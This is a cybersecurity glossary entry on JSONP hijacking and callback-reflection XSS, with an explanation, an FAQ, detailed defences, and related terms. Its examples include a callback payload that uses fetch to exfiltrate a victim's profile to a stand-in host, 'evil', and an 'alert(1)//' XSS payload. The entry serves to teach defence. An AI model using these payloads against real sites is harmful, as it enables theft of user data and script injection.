JSONP Vulnerability
What is JSONP Vulnerability?
Cross-origin data leak caused by JSONP endpoints that return sensitive, authenticated data wrapped in an attacker-supplied callback function.
JSONP (JSON with Padding) is a legacy cross-origin technique in which a server returns JavaScript of the form callback({...}) so that a page on another origin can load it with <script src>. JSONP vulnerabilities arise when such an endpoint returns authenticated user data: browsers attach the victim's cookies to a cross-site <script> request (unless the cookie is marked SameSite=Lax or Strict), so an attacker hosts a page that includes the JSONP URL with a callback name they define, and their function receives the victim's data. This sidesteps the same-origin policy, which prevents reading a cross-origin response with XMLHttpRequest or fetch but not executing it as a script. Validating the callback does not stop this leak; it only prevents the second problem, reflected XSS, which arises when the callback parameter is reflected verbatim so that arbitrary JavaScript or HTML lands in the response and can be rendered or executed in the site's own origin (for example when the endpoint is served as text/html without nosniff). Modern best practice is to remove JSONP entirely, replace it with plain JSON behind a CORS origin allow-list, and never expose sensitive endpoints to <script> inclusion; where a legacy JSONP endpoint must remain, restrict the callback to a plain identifier, serve it as text/javascript with X-Content-Type-Options: nosniff, and mark session cookies SameSite.
● Examples
- 01
A request such as /api/me?callback=window['x']=function(d){fetch('https://evil/?d='+JSON.stringify(d))} loaded from the attacker's page with <script src>: the server reflects the callback verbatim, so the victim's profile is passed to the attacker's function and sent to https://evil.
- 02
Callback parameter reflected verbatim, allowing XSS via callback=alert(1)//: the trailing // comments out the JSON argument that follows, so the reflected text runs as arbitrary JavaScript wherever the response is executed or rendered in the site's own origin.
● Frequently asked questions
What is JSONP Vulnerability?
Cross-origin data leak caused by JSONP endpoints that return sensitive, authenticated data wrapped in an attacker-supplied callback function. It belongs to the Attacks & Threats category of cybersecurity.
What does JSONP Vulnerability mean?
Cross-origin data leak caused by JSONP endpoints that return sensitive, authenticated data wrapped in an attacker-supplied callback function.
How does JSONP Vulnerability work?
JSONP (JSON with Padding) is a legacy cross-origin technique in which a server returns JavaScript of the form callback({...}) so that a page on another origin can load it with <script src>. JSONP vulnerabilities arise when such an endpoint returns authenticated user data: browsers attach the victim's cookies to a cross-site <script> request (unless the cookie is marked SameSite=Lax or Strict), so an attacker hosts a page that includes the JSONP URL with a callback name they define, and their function receives the victim's data. This sidesteps the same-origin policy, which prevents reading a cross-origin response with XMLHttpRequest or fetch but not executing it as a script. Validating the callback does not stop this leak; it only prevents the second problem, reflected XSS, which arises when the callback parameter is reflected verbatim so that arbitrary JavaScript or HTML lands in the response and can be rendered or executed in the site's own origin. Modern best practice is to remove JSONP entirely, replace it with plain JSON behind a CORS origin allow-list, and never expose sensitive endpoints to <script> inclusion.
How do you defend against JSONP Vulnerability?
Remove JSONP and serve plain JSON instead, with CORS limited to an explicit allow-list of origins (never a reflected Origin header combined with Access-Control-Allow-Credentials: true). Never return authenticated or sensitive data from an endpoint that can be included with <script src>. Where a legacy JSONP endpoint must remain: accept only a plain JavaScript identifier (optionally dotted) as the callback and reject everything else; serve the response as text/javascript with X-Content-Type-Options: nosniff and a leading comment so the body does not begin with attacker-controlled bytes; require a CSRF token or custom header for anything sensitive; and mark session cookies SameSite=Lax or Strict so cross-site <script> requests are sent without them. Operationally, inventory existing callback parameters (callback, jsonp, cb) and test each one from a cross-origin page that defines its own callback.
What are other names for JSONP Vulnerability?
Common alternative names include: JSONP leak, JSONP hijacking.
● Related terms
- appsec№ 223
CORS (Cross-Origin Resource Sharing)
A browser-enforced mechanism that lets a server selectively relax the Same-Origin Policy so that JavaScript on one origin can read responses from another.
- attacks№ 224
CORS Misconfiguration
An insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true.
- attacks№ 240
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- appsec№ 960
Same-Origin Policy (SOP)
Browser security rule that restricts how a document or script loaded from one origin can interact with a resource from a different origin.
- attacks№ 239
Cross-Site Request Forgery (CSRF)
A web attack that forces an authenticated user's browser to send unwanted requests to a vulnerable site, causing state-changing actions without consent.
- attacks№ 1016
Session Hijacking
An attack that takes over a victim's authenticated session by stealing or forging the session identifier so the attacker can act as the user without their credentials.